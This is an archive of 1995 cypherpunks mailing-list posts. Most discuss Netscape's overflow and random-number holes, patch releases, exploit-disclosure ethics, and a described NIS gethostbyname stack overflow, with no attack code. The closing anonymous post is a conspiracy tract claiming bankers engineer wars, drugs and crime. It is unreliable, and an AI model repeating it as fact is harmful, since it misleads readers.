JIy3rsKywTYuswH6aS361uaymPWusMr6ZhAeaegxnoSWnY3/Z2RlPCxDnhpROBsk vKgIf1mt8ww= =TRMS - -----END PGP SIGNATURE----- - ------- End of Forwarded Message -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGn6PfWZSllhfG25AQHuUQQAtwozCJKKxq4dlOn6SpDHs5tGbhxRWozd NUjDxffgCL2FAINsrfKR9hOXqXztYD1hQGJ4jBE+uw6sD5gGYrGct5RVuG9X51Ua HTceFbqJHd6mc3ISTMusQwQDt9kJ2DmGXqV8nt4yI20uiPKZKDVizhAqg900xqGs 78NeZuvZ5cg= =3SxM -----END PGP SIGNATURE----- From todd at lgt.com Wed Sep 27 19:25:48 1995 From: todd at lgt.com (Todd Glassey) Date: Wed, 27 Sep 95 19:25:48 PDT Subject: Information, We want information Message-ID: I an immediate need of info on the liabilities of BSD type systems, and in particular the BorderWare products. I heard that in the BorderWare product itself, there are several recently discovered potential "holes"... I have a particular interest in both the Attack MO against the BSD platforms in general and the Border products in particular... Please do not send the reply to the lists but to me personally (todd at lgt.com). I will summarize if I get enough info to be worth the effort. Any comments? Thanks In Advance... Todd Glassey todd at lgt.com From mclow at coyote.csusm.edu Wed Sep 27 20:21:08 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Wed, 27 Sep 95 20:21:08 PDT Subject: Microsoft & new Internet Security specs Message-ID: > [Company News on Call] [Return to Company Listing] > [Return to Headlines] > > MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP > IMPROVE SECURITY ON THE INTERNET > > ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT) > today announced the publication of two specifications that address key > Internet security issues. [ blah, blah, blah ] > Both can be found on the Microsoft home page (http//:www.microsoft.com). > I command-clicked on that URL, and my mail program asked me what program I wanted to use to resolve "http//" URLs :-) The correct URL is, of course, -- Marshall Marshall Clow mclow at coyote.csusm.edu I'm an engineer. I make slides no one can read. Sometimes I eat donuts. From sameer at c2.org Wed Sep 27 20:22:56 1995 From: sameer at c2.org (sameer) Date: Wed, 27 Sep 95 20:22:56 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: Message-ID: <199509280317.UAA05182@infinity.c2.org> > As for objections about how worthwhile this is, it's pretty clear > that a patch will be available for this problem before we can finish > and publicize an exploit. Which makes an exploit all the more useful. If an exploit was published well before a patch would be available, people would make accusations that the exploit publisher was aiding vandalism. (Warranted or not, 8lgm gets these accusations, etc.) Publishing the exploit after the patch is available means more of an incentive to go get the patched version. I for one, haven't picked up the patched netscape yet. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tcmay at got.net Wed Sep 27 20:38:34 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 27 Sep 95 20:38:34 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: At 6:33 PM 9/27/95, Travis Corcoran wrote: >I'm not sure whether you're objecting to someone asked for your key, >or the fact that they did it through a semi-automated process. If you go back to my original message you'll see that I was discussing the rising number of spams, advertisements, and "automatically-generated" posts. What I call a robo-warning was this: " P.S. This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests, and prompts me whether it should automatically send this msg on my behalf. If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense), or if you're interested in the software itself (mail-secure.el: a package in lisp for emacs; this is just one of the many crypto/privacy related things it does) please mail the author of this package ( tjic at openmarket.com) for details. As to whether I needed to respond to your robo-warning about how your automatic scan of incoming mail produced some kind of Signature Failure Condition Red at your end, I just ignored your message. (As others will attest, when people ask me for my key in a non-automated way, I usually send it to them. I often regret this, as they then send me PGP-encrypted mail with innocuous contents---the same reason PRZ hates to get PGP mail.) My _overall_ point was not to attack Travis C., who I don't think I even mentioned by name, but to point out that great care must be taken in running automated mail-response programs (including "vacation" programs, "I'm away from my terminal" messages, and these kinds of automated PGP messages). Finally, since Travis is making a fairly big deal over my citing of his post (though anonymously, as I recall), I'd like to see the post he claims I signed. If it has a PGP signature, it's probably an obvious spoof or satire. >If anyone has a constructive suggestion as to how this mail could be >changed to convey more information or to be less "threatening", please >mail me. Simple, don't bother to ask in the first place. Or ask informally, in ordinary English. Skip the "This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests..." nonsense. On a list with well over 1000 people, I don't need some fraction of them running their own "key etiquette agents" inspecting my posts for conformance to their preferences. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From futplex at pseudonym.com Wed Sep 27 20:44:36 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 27 Sep 95 20:44:36 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil> Message-ID: <199509280344.XAA25414@thor.cs.umass.edu> Ray Cromwell writes: # I've found a Netscape bug which I suspect is a buffer overflow and # may have the potential for serious damage. Mike D. writes: > Is there any way to avoid/prevent this problem by changing options in > NetScape? I'm afraid there's no way to completely eliminate the problem without getting the next version of Netscape. There's no apparent way to increase the size of the buffer allocated for a URL at runtime. Of course, that would only be of limited use. Certainly there's no way for a user to really fix the problem by adding a check on the length of the URL. However, a certain amount of common sense will go a long way in avoiding ugly incidents. To put it simply, "look before you leap". Before you click on a link, look at the status bar at the bottom of the Netscape window (in the Unix version at least) that displays the URL of the link under the pointer. To be safe, if it's too long to fit entirely in the status bar, view the source of the current page to find the complete URL. (Note that when a URL is too long to fit completely in the status bar, a middle portion of it is elided with "...") Also, if the link is labelled "Don't click here !" like one on my homepage, don't click there ! :} -Futplex "What if you knew her, and found her dead on the ground ? How can you run when you know ?" -Neil Young From karlton at netscape.com Wed Sep 27 20:51:49 1995 From: karlton at netscape.com (Phil Karlton) Date: Wed, 27 Sep 95 20:51:49 PDT Subject: Patch release of Netscape available Message-ID: <14494.812260307@ghoti.mcom.com> On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX, Macintosh and Windows executables. Note that these executables only support 40-bit RC4. We are working out a mechanism to be able to upgrade the 128-bit versions that is acceptable to the U.S. government. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From tcmay at got.net Wed Sep 27 20:56:07 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 27 Sep 95 20:56:07 PDT Subject: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag Message-ID: At 3:21 PM 9/27/95, Travis Corcoran wrote: >Summary: > > This message tosses out an idea for conveying within an { email | > usenet } message the datum "the author of this message prefers to > receive PGP encrypted communications" in a standard machine-readable > form. I don't dislike this idea, so my comments here are only possible routes for those who want to get PGP-encrypted mail. First, I think Hal Finney was offering at one time to remail the list to anyone in encrypted form (encrypted on his machine(s) to their PGP key, of course). This would increase the volume of PGP mail, of course. Second, others could make the same offer. Third, remailers could be used. Now encrypting a public list doesn't do much, of course, but it does increase the amount of encrypted traffic. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From karlton at netscape.com Wed Sep 27 21:02:43 1995 From: karlton at netscape.com (Phil Karlton) Date: Wed, 27 Sep 95 21:02:43 PDT Subject: NIS library code exposure Message-ID: <14539.812260953@ghoti.mcom.com> Once again I speak for myself and not Netscape. While investigating one of the crashes we ended up decompling some of the code in the C library. It turns out that in some UNIX systems, the code in gethostbyname_yp will copy the hostname argument onto a stack local buffer. That buffer appears to be of size MAXHOSTNAMELEN. [This is very efficient code at destroying the stack: it does not use strcpy or sprintf; there is an inline loop copying characters until it finds a NUL.] An unstated (in any documentaton I could find) limitation on calls to gethostbyname is that the "name" parameter must be a limited size string for it to work at all. I suspect this bug has been in the NIS (nee YP) code for some time. Do you have any daemons that run as root and do networking? Are you sure that all of them check the length of the host name before passing it to gethostbyname? [Avoid the fencepost error: MAXHOSTNAMELEN is really the size of the buffer and not the maximal string length. You need room for the trailing NUL.] We have not looked into the networking libraries that are typically found on a PC or Macintosh. The exposure may also be present there. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From tcmay at got.net Wed Sep 27 21:13:48 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 27 Sep 95 21:13:48 PDT Subject: Using sound cards to accelerate RSA? Message-ID: At 2:39 PM 9/27/95, Simon Spero wrote: >Somebody mentioned the possibility of using the a/d stage of a sound card >as a source of random bits, and that brought a thought back to mind: >given that a lot of sound cards are now shipping with DSP chips on board, >has anyone written any code that uses the cards DSP to accelerate RSA >processing? > >Maybe there's a mass market market for a crypto-blaster- an RNG, 3 or 6 >DES chips, and a DSP. It would make for a killer linux based SHTTP server... But I don't think Soundblaster-class DSP performance is especially impressive compared to where the market is going with Pentiums. (AMD and Cyrix have both announced plans to exit the 486 market as rapidly as they can--and of course Intel has been doing that for some time already.) It made more sense 2-3 years ago, and a couple of people were talking about finding ways to use modems and DSP cards to accelerate crypto functions. (Paul Rubin, for example, was looking at Trailblazer modems...) Another problem with such solutions is that they often get marginalized, or left on the sidelines. This has to do with lots of things, including the percentage of people who have various add-on cards, the power of their main CPUs, etc. (Many things to touch on here. Apple used a DSP chip in their 840av and 660av models, but various problems in supporting these chips cropped up, and Apple phased them out in favor of PPC-only configurations. Intel is pushing "native signal processing" to both sell faster CPUs and ease the programming efforts in supporting DSP chips. Time will tell.) For other reasons, software solutions are generally preferable to hardware-dependent solutions. Finally, few crypto applications seem to be limited very much by speed at this time. Audio and video apps, of course, put a strain on processing power, and this is where DSP capabilities make the most difference, probably. Finally (for real), the effort in supporting DSP chips could probably better be spent elsewhere, given the small effects of a slight increase in speed. Getting PGP more widely integrated into popular programs would seem to me to be a bigger win than in reducing the time to encrypt a message from 3.2 seconds to 1.9 seconds. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From patrick at Verity.COM Wed Sep 27 21:42:07 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 27 Sep 95 21:42:07 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: <9509280438.AA23997@cantina.verity.com> > > but the key was not there. Please mail me your key. Thank you. > > > If anyone has a constructive suggestion as to how this mail could be > changed to convey more information or to be less "threatening", please > mail me. > Sure, I found the above offensive. It comes across in exactly the same tone as a cop saying, "Please step away from the car." I know it's silly, but sometimes Please just isn't enough. The simple change: but the key was not there. Could you please mail me your key? Thanks. works miracles:) The tone on the rest of it was nice. You have to be careful with imperatives. They usually sound mean...even with a please at the front. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From rjc at clark.net Wed Sep 27 21:58:52 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 27 Sep 95 21:58:52 PDT Subject: Patch release of Netscape available In-Reply-To: <14494.812260307@ghoti.mcom.com> Message-ID: <199509280458.AAA27626@clark.net> > > On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX, > Macintosh and Windows executables. Note that these executables only > support 40-bit RC4. We are working out a mechanism to be able to > upgrade the 128-bit versions that is acceptable to the U.S. > government. Does this release patch both the RNG and the overflow bugs or just the RNG? -Ray From patrick at Verity.COM Wed Sep 27 22:02:04 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 27 Sep 95 22:02:04 PDT Subject: Looking for advice. Message-ID: <9509280458.AA24011@cantina.verity.com> For two programs communicating via TCP/IP and exchanging authentication information, I want to make sure that the authentication info, (user's name and password,) doesn't pass in the clear. I can think of a few ways to handle this. 1) Encrypt via shared key using symetric encryption. This works but key management is a problem. 2) Encrypt via public keys using public key encryption. There's licensing issues, and how do you generate public and private pairs for all of the programs? That could be a lot of primes! 3) The "server" could keep user names and passwords stored as hashed values. That way the "client" could do a hash (MD5?) before sending it. This has the drawback of the server not having access to the unhashed values...if it needs that access this method won't work. What are other possibilities? What are the answers to my questions and issues above? Can you help? Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From coe at best.com Wed Sep 27 22:16:00 1995 From: coe at best.com (C.O.E) Date: Wed, 27 Sep 95 22:16 PDT Subject: Mathematics Library Plus -- Interactive Math Tutorial Message-ID: The Mathematics Library Plus Series include five (5) CD-ROM titles featuring Algebra, Calculus, Statistics, Geometry, and Trignometry Each CD-ROM title is a compendium of scientific and mathematical equations. Each listing explains the fundamental principle(s), corollaries of the equation and its sample usage. Each CD-ROM title is a step-by-step and easy-to-follow interactive tutorial software for students from high school to college levels. A comprehensive self study guide with online text references and a useful resources for pre-test practices. Hundreds of problems ranging from easy to difficult and come with interactive hints and solutions. For more info, please visit http://www.coe.com/ari/ To download a copy of the MLP sampler, use anonymous ftp to ftp.coe.com Under the directory, pub/outgoing/mlp Thank you. info at coe.com From karlton at netscape.com Wed Sep 27 22:16:58 1995 From: karlton at netscape.com (Phil Karlton) Date: Wed, 27 Sep 95 22:16:58 PDT Subject: Patch release of Netscape available In-Reply-To: <199509280458.AAA27626@clark.net> Message-ID: <306A2FA6.41C6@netscape.com> Ray Cromwell wrote: > Does this release patch both the RNG and the overflow bugs or just > the RNG? Both. We fixed the overflow bugs we could find, including all the examples mailed to cypherpunks. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From fair at clock.org Wed Sep 27 22:40:30 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Wed, 27 Sep 95 22:40:30 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: At 15:21 9/27/95, Bill Stewart wrote: >Notes was a PC network reimplementation of PLATO, the system that also inspired >notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was >originally inspired by PLATO or not...) Netnews assumes that articles are >going to propagate for a while and then be trashed; notesfiles assumes you're >building a knowledge bases that sticks around. (This transitoriness has >allowed >netnews to scale to its current N*100MB/day of trash :-) Netnews was the old "msgs" program on serious steroids - the thing everyone was supposed to run in their .login (or .profile) scripts to get system-wide announcements. My bet is that msgs was inspired by the TOPS-20/ITS equivalents at MIT. Netnews subsequently underwent relatively rapid forced evolution in its early days to meet the scaling demands of the UUCP network, and the Internet of that time (~1983). The "notesfiles" system from UIUC that Rob Kolstad and Ray Essick wrote was not so much a distant cousin of NetNews as it was a similar system designed to solve the same problem (distributed message-based computer conferencing); I would argue that NetNews had the better transports and backends, but notesfiles was one or two up on NetNews in UI features (message threads, etc). The two were sufficiently close that (bad) gateways were written to move messages from one system to the other. With any luck, the next round of NetNews user interfaces will remove all of the UI advantages of notesfiles - the hooks have always been there, but writing good UI's hard work, and most NetNews hackers (me included) have had more fun/luck/interest in hacking the transport level to be ever more slightly efficient. >AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX >network >to support Notes on; I think it's now rolled out an accepting customers, >but it was mostly in press-release stage while I was at AT&T. I had the impression from what I read that this was going to be an IPX WAN, and that after announcing this Brave New Service, the partners discovered just how poorly IPX behaves on a WAN, and so have backed out to Notes on IP for this thing. I haven't heard much about it since, but I'd be surprised to find AT&T being foolish enough to try and operate an IPX WAN. >Notes does have encryption, using RSA and I think RC4; I'm not sure if they >do the >40 bits exportable/ 128 domestic bit or just use 40 bits. Don't know about >overflow >kinds of bugs; the bugs I've heard about were more problems integrating with >Cc:Mail :-) Lotus is indeed one of RSA's licensees; I remember reading that in the WSJ at about the same time that Apple became one. I still place my message-based distributed collaboration bets on NetNews technology, or some obvious derivative of it. Erik Fair From goedel at tezcat.com Wed Sep 27 22:40:32 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Wed, 27 Sep 95 22:40:32 PDT Subject: Netscape seems to fix the overflow bug Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Simple testing with the Netscape update would seem to indicate that the overflow bug has been fixed. How about the RNG hole? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMGpDRHIf3YegbdiBAQFf4wJWIaseQP3CL4V7aEs8HMmU4MB2jYVpyLhx C4ER+a9Ho9bIbaipATtuL+E0oaq77AEeaB7TMQBl+upzcttifH9Y9hANYUQ7Q8vS jkRa =wN48 -----END PGP SIGNATURE----- Dietrich Kappe | Red Planet http://www.redweb.com Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 From jsw at neon.netscape.com Wed Sep 27 22:41:42 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 22:41:42 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: Message-ID: <44dcgs$b36@tera.mcom.com> In article , cman at communities.com (Douglas Barnes) writes: > As for objections about how worthwhile this is, it's pretty clear > that a patch will be available for this problem before we can finish > and publicize an exploit. This is not, however, the last piece of > network software that will contain problems of this sort, and it is > a good idea to build up expertise in this area. I'd also suggest going > after some of the other browsers... I know, for instance, that AOL's > browser dies horribly on these same sort of URLs. The patched version is now available at ftp://ftp.netscape.com/pub/netscape/ --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Wed Sep 27 22:48:34 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 22:48:34 PDT Subject: It's Wednesday In-Reply-To: <199509271646.MAA06516@panix.com> Message-ID: <44dcts$b36@tera.mcom.com> In article <199509271646.MAA06516 at panix.com>, frissell at panix.com (Duncan Frissell) writes: > Do you know where your new Netscape is? Sure. Its on ftp://ftp.netscape.com/pub/netscape. It has been there for several hours. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Wed Sep 27 22:49:54 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 22:49:54 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil> Message-ID: <44dd09$b36@tera.mcom.com> In article <9508278122.AA812233405 at ax.asc-yf.wpafb.af.mil>, donlonm at ccmail.mcclellan.af.mil writes: > Ray, > > You wrote: > > >I've found a Netscape bug which I suspect is a buffer overflow and > >may have the potential for serious damage. If it is an overflow bug, > >then it may be possible to infect every computer which accesses a web > >page with Netscape. > > Is there any way to avoid/prevent this problem by changing options in > NetScape? Just get the fixed version, or a patch from: ftp://ftp.netscape.com/pub/netscape/ --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From hayden at krypton.mankato.msus.edu Wed Sep 27 22:58:13 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 27 Sep 95 22:58:13 PDT Subject: Problems with netscape patch and W95 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I thought I'd post this here since there is a netscape dude hanging around :-) I downloaded teh patch for the 32-bit windoze version and couldn't get it installed. I had the old installation in the default C:\Program Files\Netscape\Navigator (with the space in the directory name), but every incarnation I tried, including the Progra~1 8.3 name couldn't be found. I finally just stripped out the old an reinstalled the new. Anooying but functional. Please double check this in any future patches, or better yet, put in a seach utility that finds it for you, something like "Netscape was found in C:\Foo\Bar. Patch here?" If no, then search more until exhausted. Sorry for the non-CP traffic, just trying to reach the right people the fastest. :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMGoddDokqlyVGmCFAQFQwAP/ZbC46g8gdZ1l+QEXjKz7MtLW/WNNlBGI CCO8A0pmescH1uP9vfSMt2gfuR59DMHsVNSjloY0AO0LWSqLSnlHO4JOMajhysOZ hnpL63BtrR50o3RBoZ8awqx0h+LWjm3U9gh9m0xcsq3vB67a7VW3m9CpJ3yRWQVJ usZ7HyjcHEE= =mva0 -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++** ------END GEEK CODE BLOCK------ From ravage at einstein.ssz.com Wed Sep 27 22:59:17 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Wed, 27 Sep 95 22:59:17 PDT Subject: Mathematics Library Plus -- Interactive Math Tutorial (fwd) Message-ID: <199509280612.BAA07163@einstein.ssz.com> Forwarded message: From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:11:31 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 27 Sep 95 23:11:31 PDT Subject: No Subject Message-ID: <199509280611.HAA02214@utopia.hacktic.nl> that they do. 95% of all "cash" transactions in the U.S. are by check. Checks are thus effectively also currency. The banker creates the so- called "loan" by writing a check or deposit slip, not against actual money, but against your promise to pay back the loan. The only cost to the bank is the paper,ink, and a few dollars in salaries and office costs for each tansaction. It is "check-kiting" on an enormous scale! The profits are enormous as shown below. THE COST TO YOU? PRACTICALLY EVERYTHING In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen. State and local debts were practically non-existent, and government was small and not oppressive. By 1920, after only six years of the Federal Reserve handling our currency, the federal debt had jumped to $24 billion - $228 per citizen. The Federal Government began to grow like an invisible cancer in its ear- ly stages. By 1968 the federal debt had jumped to $347 billion - $1,717 per cit- izen. Ten years later, by 1978 it had doubled again to $763 billion - $3,500 per citizen. That is a debt of $17,500 for every family of five in America. Federal debt has been growing faster and faster since. And the Federal Government has become a debilitating cancer rapidly sapping and weakening its victim. Today in 1992 the federal debt is over $4 trillion. (And they "cook the books" on the low side to come up with that figure - see Chapter Nine.) The $4 trillion national debt amounts to $16,000 per citizen, or $80,000 per family of five. And if that debt were calculated in terms of working or tax-paying families, it would be considerably higher. The Federal Gov- ernment has become a bloated, out-of-control parasite, a terminal cancer. The economy seems so weak that even after many months of blowing up the currency supply, signs of recovery have to be searched for. The entire system may be on the brink of complete collapse. The above figures do not include state, municipal, school district, business, or personal debts, which total an additional $3 trillion. Total debt in America is thus over $7 trillion - $28,000 per citizen - $120,000 per family of five. This is more than twice the assessed value of all the land and buildings in America. Effectively all of America has been signed over to the bankers. They can take America and we would still owe them another America! Of course, it is to their advantage not to take actual title to the property, so we will not realize that we really own nothing. Instead they leave us with "ownership" so we will willingly continue to work and pay ever higher tributes to the bankers. What we really have is national bankruptcy. Let me repeat the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs.. I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this won- derful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected." THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS To grasp the fact that periodic withdrawal of currency through interest payments to the bankers will inexorably transfer all wealth in the nation to the receivers of interest, imagine yourself in a poker or dice game. Everyone has to buy chips (the medium of exchange) from a "banker" who does not risk chips in the game, but watches the table and every hour rea- ches in and takes 10% to 15% of all the chips on the table. As the game progresses, the number of chips in the possession of each player will go up and down with his or her "luck." However, the total number of chips available to play the game (carry on business and trade) will decrease steadily, while the "banker's" mountain of chips just grows and grows. The game will get low on chips, and some players will run out. If they want to continue to play, they must buy or borrow more chips from the "banker." The "banker" will sell (lend) the player more chips only if the player signs a "mortgage" agreeing to give the "banker" some real pro- perty (car, home, farm, business, etc.). If the payments should go into default, the banker takes the property. The payments must be made on time, whether the player wins (makes a profit) or not. It is easy to see that no matter how skillfully the players play, eventually the "banker" will end up with all of his chips back. Except for the very best or "luckiest" players, the rest, if they stay in the game long enough, will end up owing to the "banker" their cars, their homes, their farms, their businesses, and perhaps even their watches, rings, and the shirts off their backs! Sir Josiah Stamp, President of the Bank of England in the 1920s, and the second richest man in Britain at the time, said: "Banking was conceived in iniquity and was born in sin. The bankers own the earth. Take it away from them but leave them in power to create deposits, and with the flick of the pen they create enough deposits to buy it back again. However, take it away from them, and all the great fortunes like mine will disappear, and they ought to disappear, for this would be a happier and better world to live in. But, if you wish to re- main the slaves of bankers and pay the cost of your own slavery, let them continue to create deposits." Our real-life situation is much worse than any poker game. In a poker game no one is forced to go into debt, and anyone can quit at any time and keep whatever he or she still has. But in real life, even if we borrow little ourselves from the bankers, the local, state, and federal govern- ments borrow billions in our name, squander it, then confiscate our earn- ings from us and pay it to the bankers with interest. We are forced to play their game, and it seems we can only leave the game by dying. We pay as long as we live, and our childern pay after we die. If we cannot pay, the same government sends the police to take our property and give it to the bankers. The bankers risk nothing (at least, the Federal Reserve bankers) in the game; they just collect their percentage and "win it all." In Las Vegas all the games are "rigged" to pay the house (owner) a percentage. They rake in millions. The Federal Reserve bankers' "game" is similarly rigged, and it pays off in billions. In recent years bankers have added more "cards" to their game. "Credit" cards are promoted as a convenience and a great boon to trade. Actually, they are ingenious devices by which bankers collect %2 to 5% of every retail sale from the seller and 18% or more interest from buy- ers. A real stacked deck! POLITICIANS AND BANKERS IN THE SAME LEAGUE Democrat, Republican, and Independent voters have wondered why poli- ticians always spend more tax currency than they collect. The reason should now be clear. When you study our "debt-currency" system, you soon realize that the politicians are not the agents of the people. They are the agents of the Federal Reserve Bankers, for whom they plan ways to place the people further in debt. Let me again quote the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonder- ful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected." Article 1, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But what have our politicians done? In 1913 the traitorously gave the U.S. Treasury to the Federal Reserve bankers - lock, stock, and barrel! Someone recently asked, "What's the difference between Kindergarten and Congress?" Answer: "One has adult supervision!" Actually, we shouldn't criticize Congress, after all, we have the best Congress money can buy. Chapter Ten examines Congress in more detail. FEDERAL RESERVE SYSTEM AUDIT The Federal Reserve has never been audited by the government. In 1975 a bill H.R. 4316, to require Federal Reserve audits, was introduced in Congress. Due to pressure from the currency-controllers, it was rejected. No audit of the Federal Reserve has ever been done. MOUNTING DEBTS AND WARS We, as a people are now ruled by a "banker-owned system" that has usurped the mantle of government, disguised itself as our legitimate government, and set about to pauperize and control the people. It is now a centralized, all-powerful apparatus whose main purposes are spending the people's currency, promoting war, and propagandizing to perpetuate itself in power. Our two large political parties (the "Demopublicans" also call- ed "Republicrats") have become its servants, the various departments of government its spending agencies, and the Internal Revenue Service its collection agency. Unknown to the people, our "banker-owned system" operates in close cooperation with similar apparatuses in other nations, also disguised as "governments." Some, we are told, are friends. Others, we are told, are enemies. "Enemies" are built up through international manipulations and used to frighten the American people into going billions of dollars more into debt to the bankers for "military preparedness," "foreign aid to stop communism," "minority rights," etc. Citizens, deliberately confused by brainwashing propaganda, watch helplessly while our politicians give our food, goods, and gold to banker-controlled alien governments under the guise of "better relations," "easing tensions," or "humanitarian aide." Our banker-controlled government takes our finest and bravest sons and sends them into foreign wars, where tens of thousands are murdered and hundreds of thousands are crippled. Other thousands are morally corrupted and addicted to drugs. When the "war" is over we have gained nothing, but we are scores of billions mre in debt to the bankers - which was the real reason for the war in the first place! MORE THAN JUST ECONOMIC RAPE The profits from these massive debts have been used to erect a com- plete and almost hidden economic and political colossus over our nation. Our "banker-owned system" keeps telling us they are trying to do us good, when in truth they work to harm and injure the people. These would-be despots kow it is easier to control and rob an ignorant, poorly-educated, and confused people than it is an informed population, so they deliber- ately degrade our educational systems. For the same reason they secretly favor drug use, alcohol, racial conflict, and crime in general. Their "war on drugs," as an example, only produces more drug use and a host of relat- ed crimes. Everything which debilitates the minds and bodies of the people is secretly encouraged, as it makes the people less able to oppose them, or even to understand what is being done to them. The system wants medio- cre, unthinking, helpless "sheople." Family, morals, and all that is honorable is being swept away, while our "banker-owned system" builds their new subservient man, the found- ation of their "new world order." Our new rulers are trying to change our whole political, social, and racial order, but they will not change the 